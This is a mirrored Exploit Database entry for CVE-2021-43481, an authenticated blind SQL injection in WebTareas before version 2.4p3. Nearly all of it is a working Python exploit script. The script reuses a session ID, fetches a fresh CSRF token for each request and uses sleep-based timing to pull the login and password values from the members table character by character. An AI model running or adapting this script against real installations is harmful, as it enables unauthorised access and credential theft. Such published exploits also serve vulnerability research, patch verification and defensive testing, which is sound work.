WebTareas 2.4 – Blind SQLi (Authenticated)

• Exploit Database
• 19 阅读

• 作者： Behrad Taher
  日期： 2022-05-11
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/50893/

• # Exploit Title: WebTareas 2.4 - Blind SQLi (Authenticated)
  # Date: 04/20/2022
  # Exploit Author: Behrad Taher
  # Vendor Homepage: https://sourceforge.net/projects/webtareas/
  # Version: < 2.4p3
  # CVE : CVE-2021-43481
  
  #The script takes 3 arguments: IP, user ID, session ID
  #Example usage: python3 webtareas_sqli.py 127.0.0.1 1 4au5376dddr2n2tnqedqara89i
  
  import requests, time, sys
  from bs4 import BeautifulSoup
  ip = sys.argv[1]
  id = sys.argv[2]
  sid = sys.argv[3]
  
  def sqli(column):
  print("Extracting %s from user with ID: %s\n" % (column,id))
  extract = ""
  for i in range (1,33):
  #This conditional statement will account for variable length usernames
  if(len(extract) < i-1):
  break
  for j in range(32,127):
  injection = "SELECT 1 and IF(ascii(substring((SELECT %s FROM gW8members WHERE id=1),%d,1))=%d,sleep(5),0);" % (column,i,j)
  url = "http://%s/approvals/editapprovaltemplate.php?id=1" % ip
  GET_cookies = {"webTareasSID": "%s" % sid}
  r = requests.get(url, cookies=GET_cookies)
  #Because the app has CSRF protection enabled we need to send a get request each time and parse out the CSRF Token"
  token = BeautifulSoup(r.text,features="html.parser").find('input', {'name':'csrfToken'})['value']
  #Because this is an authenticated vulnerability we need to provide a valid session token
  POST_cookies = {"webTareasSID": "%s" % sid}
  POST_data = {"csrfToken": "%s" % token, "action": "update", "cd": "Q", "uq": "%s" % injection}
  start = time.time()
  requests.post(url, cookies=POST_cookies, data=POST_data)
  end = time.time() - start
  if end > 5:
  extract += chr(j)
  print ("\033[A\033[A")
  print(extract)
  break
  #Modularized the script for login and password values
  sqli("login")
  sqli("password")